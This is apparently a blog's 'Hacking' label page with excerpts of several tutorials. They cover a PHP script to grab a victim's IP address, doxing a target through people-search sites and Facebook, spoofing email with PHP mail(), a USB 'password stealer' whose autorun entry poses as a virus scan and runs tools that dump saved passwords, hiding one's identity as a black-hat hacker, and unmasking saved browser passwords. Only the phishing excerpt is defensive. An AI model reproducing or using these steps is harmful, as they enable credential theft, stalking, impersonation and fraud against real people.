Skip to main content

Posts

Showing posts with the label Hacking

How To Grab Someone's IP Address ?

In this tutorial I will you show you how to grab someone’s IP address using PHP script. This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.
How To Hack Someone Ip Address ? 1. Copy the below codes into Notepad and save it as Grab.php (.php is must) 
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);

imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";

Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imag…

What Is Doxing? Doxing and its Uses............

You’re probably thinking, “Okay, so basically it’s getting information from searching someone’s email on Google right?” in a sense yes, but there are actually easier ways to get someone’s information online. The most popular and most common method is to use a website calledPipl (http://www.pipl.com/). Pipl allows you to search for full names, emails, usernames, and even phone numbers, thus making it a very useful tool for hackers. Another source hackers can use isFacebook (http://www.facebook.com). Sure, Facebook allows full name searches, but most hackers aren’t using it for its name search; they’re using it for its email search.The main goal when Doxing is to find the target’s email (if you don’t have it). Your email is essentially your passport online; you sign up for websites using it, you have personal information on it, and if someone has access to it, they can essentially pretend to be you online. Once the hacker has the email, all he has to do is put it intoFacebook or Pipland…

How to Check The email is original or Not

First of all let us see How email system is working over internet.
The email is sent on internet as shown in below picture


So Here The Sender i.e abc@server1.com is sending a mail to xyz@server2.in. so the sender will type the mail and click on
send button and the mail will go to SERVER1.com whereSERVER1.com will forward the mail over internet and the internet
will search the xyz@server2.in email ids server and send it to SERVER2.in and the the SERVER2.in will search for
the xyz@server2.in in their own database and then the mail will be forwarded to xyz@server2.in and when the XYZ user
login to their account they will see an email in their inbox which is from abc@server1.com.
Now How To send the fake mail To send fake mail We need to Bypass the abc@server1.com and SERVER1.com both and directly send an email over
internet .
So for that we will use a .php script as php has a function mail(); which can send email to any one without the
SERVER1.com and directly delivering the mail to SER…

What is A PHISHING attack ? And how to avoid it.....

Phishing   The act of sending an Email to a user falsely claiming to be an established legitimate enterprise in an attempt to
scam the user into surrendering private information that will be used for identity theft.

   The Email directs the user to visit a Web site where they are asked to update personal information, such as
passwords and credit card, social security, and bank account numbers, that the legitimate organization already
has. The Web site, however, is Bogus and set up only to steal the User’s information.





Phishing scams could be
  Emails inviting you to join a Social Group, asking you to Login using your Username and Password.

  Email saying that Your Bank Account is locked and Sign in to Your Account to Unlock IT.

  Emails containing some Information of your Interest and asking you to Login to Your Account.


  Any Email carrying a Link to Click and asking you to Login.




Prevention against Phishing
  Read all the Email Carefully and Check if the Sender is Original

  Watch the L…

How to Trace Any IP Address

How to Trace the IP Address Back to the Source? In fact, tracing an IP address back to its location is a lot simpler than what many people imagine. There exists many online tools using which you can accomplish this job. One of my favorite site is IP2Location.com.
Just go to http://www.ip2location.com/demo.aspx and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address:
Country in which the IP is located City to which the IP address belongs to Latitude/Longitude of the IP’s location Zip Code of the region to which the IP belongs to Time Zone associated with the IP Name of the ISP to which the IP address belong to

How to make a USB PASSWORD STEALER

Guyz in this Tutorial i will tell you how to Steal/Hack someone’s computer passwords through USB Flash Drive…
As we know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Most of people have lack of time and they had just asked their Browser/windows to save their passwords,As we know that there are many tools to recover Saved passwords,so in this article i will explain you on How to made a USB passwords stealer and steal saved passwords.
Step 1: Create New/open notepad/wordpad…Type or copy/paste Red Text below:-
[autorun]open=launch.batACTION= Perform a Virus Scan
Save this as AUTORUN.inf

Step 2: Open a new notepad/wordpad document…Type or copy/paste Red Text below…

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext Chr…

Staying Anonymous

If you are planning to be Black/ Grey/ Green Hat hacker, then you will be really worried about you anonymity. What concerns you most have to be "How to stay Anonymous?" . So here are some methods to stay anonymous. These are only some basic anonymity techniques and the more advanced techniques will be lectured in the following tutorials.
VPN                                                                                     VPN is the acronym of Virtual Private Network. As from a hacker's point of view, here are the facts that justifies its need:

1) Counterfeit the ISP's packet detection measures.Maintain your anonymity and boost by keeping your ISP from throttling, inspecting and prioritizing the data sent to and from your system.
2) Keep your IP address anonymous.Prevent the places your packets are traversing from identifying your connection information and location.
3) Hide your online activities from third parties.As a VPN provides a secure tunnel to make a connectio…

How To Reveal Hidden Passwords (Asterisks) In Web Browsers

In many places where you need to input your password to gain access, authorize or confirm a transaction, whenever you type passwords into the input text box, the characters automatically turns into asterisks or bullets. This is to protect your password from straying eyes. However, in situations that require you to know what lies behind those asterisks, we’ve got a simple trick to reveal the passwords on your web browsers. These hidden passwords are disguised with the help of simple HTML and CSS. So just changing the value of something specific will easily reveal what’s behind those bullets or astericks. We’ll show you how this is done in Google Chrome and Firefox. Google ChromeIn any website which contains your saved password, right click on the password box and click on Inspect element.




You’ll now notice the bottom quarter of your screen filled with codes. You only need to focus on the highlighted (in blue) part to reveal the password.

Look for type="password" and double cli…